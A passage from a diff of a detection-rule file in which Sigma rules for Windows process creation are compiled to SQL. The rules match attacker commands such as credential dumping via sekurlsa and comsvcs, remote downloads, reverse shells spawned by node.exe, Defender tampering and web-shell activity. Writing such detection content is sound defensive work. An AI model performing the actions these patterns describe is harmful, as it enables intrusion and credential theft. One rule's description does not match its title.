'%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + 
"SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": 
"4bf943c6-5146-4273-98dd-e958fd1e3abf", - "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", + "status": "experimental", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": 
"1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "status": "experimental", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", "status": "stable", - "description": "Detects 
exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "status": "experimental", + "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", "tags": [ - "attack.collection", - "attack.t1005" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "status": "test", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_node_abuse.yml" - }, - { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", - "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" - ], + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "status": "experimental", + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE 
'%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_susp_download_office_domain.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Execute MSDT Via Answer File", + "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "status": "experimental", + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": 
"4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "title": "PrintBrm ZIP Creation of Extraction", + "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE 
'\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": 
"test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", - "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": 